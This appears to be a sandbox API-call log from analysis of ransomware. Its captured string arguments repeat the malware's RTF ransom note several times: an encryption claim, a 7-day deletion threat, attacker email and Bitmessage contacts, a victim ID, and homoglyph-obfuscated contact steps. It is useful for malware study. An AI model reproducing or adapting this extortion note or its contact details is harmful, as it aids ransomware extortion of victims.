fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.919] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0294.919] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9b08, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 